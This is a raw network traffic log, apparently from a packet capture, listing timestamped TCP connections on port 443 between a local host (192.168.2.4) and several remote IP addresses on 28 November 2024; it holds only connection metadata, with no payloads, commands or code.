                                                                                                                                          Nov 28, 2024 11:32:13.366099119 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.366107941 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.366148949 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.442924976 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.442943096 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.443006039 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.443017960 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.443068027 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.458415985 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.458431005 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.458484888 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.458492994 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.458533049 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.717016935 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.717034101 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.717083931 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.717089891 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.717128992 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.717138052 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.717168093 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.717185020 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.838685036 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.838706017 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.838737011 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.838747025 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.838777065 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.838804960 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.839760065 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.839776039 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.839844942 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.839852095 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.839889050 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.840271950 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.840286970 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.840348005 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.840353012 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.840382099 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.840423107 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.841996908 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.842014074 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.842062950 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.842068911 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.842138052 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.842138052 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.842701912 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.842715979 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.842761040 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.842767000 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.842808008 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.843710899 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.843724966 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.843780994 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.843787909 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.843836069 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.844605923 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.844620943 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.844696999 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.844702959 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.844758987 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.845287085 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.846296072 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.846308947 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.846349001 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.846354008 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.846394062 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.846848011 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.846863031 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.846945047 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.846957922 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.846966982 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.846997023 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.847069025 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.847671032 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.847753048 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.847754002 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.847800970 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.848833084 CET49743443192.168.2.4118.27.122.26
                                                                                                                                          Nov 28, 2024 11:32:13.848858118 CET44349743118.27.122.26192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.858556032 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.858582020 CET44349749151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.858712912 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.859091997 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:13.859101057 CET44349749151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.999002934 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:13.999037027 CET44349750104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.999161959 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:13.999255896 CET49751443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:13.999281883 CET44349751104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.999334097 CET49751443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:13.999644041 CET49751443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:13.999660015 CET44349751104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:13.999953032 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:13.999964952 CET44349750104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.000255108 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:14.000330925 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.000402927 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:14.000596046 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:14.000633001 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.001589060 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:14.001617908 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.001668930 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:14.001868963 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:14.001882076 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.143781900 CET49754443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:14.143795967 CET4434975420.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.143909931 CET49754443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:14.146755934 CET49754443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:14.146768093 CET4434975420.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.338547945 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.339015961 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.339031935 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.340131998 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.340228081 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.341466904 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.341466904 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.341475964 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.341527939 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.378839970 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.379633904 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.379652977 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.380686045 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.380804062 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.381221056 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.381221056 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.381233931 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.381283045 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.388066053 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.388079882 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.435571909 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.435580015 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.435587883 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.480238914 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.775999069 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.819308996 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.831458092 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.832598925 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.832668066 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.832703114 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.832734108 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.832746983 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.832794905 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.841183901 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.841324091 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.841334105 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.850235939 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.850596905 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.850605011 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.858753920 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.858870983 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.858877897 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.896109104 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.896117926 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.896151066 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.896162987 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.896177053 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.896184921 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.896193027 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.896220922 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.896245003 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.896301985 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.913779020 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.913785934 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:14.961196899 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:14.961205006 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.007283926 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.020591021 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.020602942 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.020631075 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.020658016 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.020698071 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.020711899 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.020741940 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.024898052 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.043484926 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.047204971 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.047257900 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.047266960 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.055073023 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.055121899 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.055130005 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.060204029 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.060221910 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.060269117 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.060276985 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.060324907 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.062900066 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.062947989 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.062954903 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.070636034 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.070683002 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.070691109 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.078509092 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.078566074 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.078573942 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.094042063 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.094088078 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.094094992 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.100030899 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.100084066 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.100090027 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.106123924 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.106157064 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.106169939 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.106175900 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.106215954 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.111819029 CET44349749151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.112004995 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.112019062 CET44349749151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.112185955 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.113048077 CET44349749151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.113101959 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.113444090 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.113507986 CET44349749151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.113570929 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.113576889 CET44349749151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.142270088 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.142311096 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.142312050 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.142322063 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.142354012 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.153336048 CET49749443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.198281050 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.198301077 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.198343992 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.198349953 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.198388100 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.222980976 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.222997904 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.223052979 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.223061085 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.223115921 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.231132030 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.231182098 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.231189013 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.231235981 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.231275082 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.233187914 CET49745443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.233201981 CET44349745151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.253623009 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.259861946 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.259892941 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.259910107 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.259921074 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.259960890 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.260449886 CET44349750104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.260659933 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.260670900 CET44349750104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.261698008 CET44349750104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.261758089 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.262325048 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.264158964 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.264925957 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.264990091 CET44349750104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.265208960 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:15.265233994 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.265371084 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.265377045 CET44349750104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.266549110 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.266607046 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:15.267488956 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:15.267558098 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.267636061 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:15.267644882 CET44349752104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.269171953 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.269217968 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.269226074 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.274240971 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.274286985 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.274295092 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.279083014 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.279140949 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.279149055 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.301723003 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.301772118 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.301779985 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.304343939 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.304548979 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:15.304562092 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.305752039 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.305816889 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:15.306771994 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:15.306842089 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.306907892 CET49753443192.168.2.4104.18.10.207
                                                                                                                                          Nov 28, 2024 11:32:15.306914091 CET44349753104.18.10.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.311063051 CET49750443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.311110973 CET49752443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:15.312491894 CET44349751104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.312742949 CET49751443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.312751055 CET44349751104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.316293955 CET44349751104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.316348076 CET49751443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.316764116 CET49751443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.316847086 CET44349751104.17.24.14192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.316886902 CET49751443192.168.2.4104.17.24.14
                                                                                                                                          Nov 28, 2024 11:32:15.319053888 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.319061995 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.319093943 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.319106102 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.319113016 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.319118977 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.319138050 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.319154024 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.319159031 CET44349746151.101.66.137192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:15.319169998 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.319180012 CET49746443192.168.2.4151.101.66.137
                                                                                                                                          Nov 28, 2024 11:32:15.355936050 CET49753443192.168.2.4104.18.10.207
